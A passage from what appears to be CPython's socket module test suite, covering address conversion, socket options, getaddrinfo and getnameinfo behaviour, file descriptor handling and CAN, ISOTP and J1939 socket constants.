self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = socket_helper.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = socket_helper.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = socket_helper.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if socket_helper.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet db before running test
# (issue #12804, issue #25138).
with socket_helper.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(socket_helper.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (socket_helper.HOSTv6, 0, -10))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if socket_helper.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_CAN_J1939, 'CAN J1939 required for this test.')
class J1939Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testJ1939Constants(self):
socket.CAN_J1939
socket.J1939_MAX_UNICAST_ADDR
socket.J1939_IDLE_ADDR
socket.J1939_NO_ADDR
socket.J1939_NO_NAME
socket.J1939_PGN_REQUEST
socket.J1939_PGN_ADDRESS_CLAIMED
socket.J1939_PGN_ADDRESS_COMMANDED
socket.J1939_PGN_PDU1_MAX
socket.J1939_PGN_MAX
socket.J1939_NO_PGN
# J1939 socket options
socket.SO_J1939_FILTER
socket.SO_J1939_PROMISC
socket.SO_J1939_SEND_PRIO
socket.SO_J1939_ERRQUEUE
socket.SCM_J1939_DEST_ADDR
socket.SCM_J1939_DEST_NAME
socket.SCM_J1939_PRIO
socket.SCM_J1939_ERRQUEUE
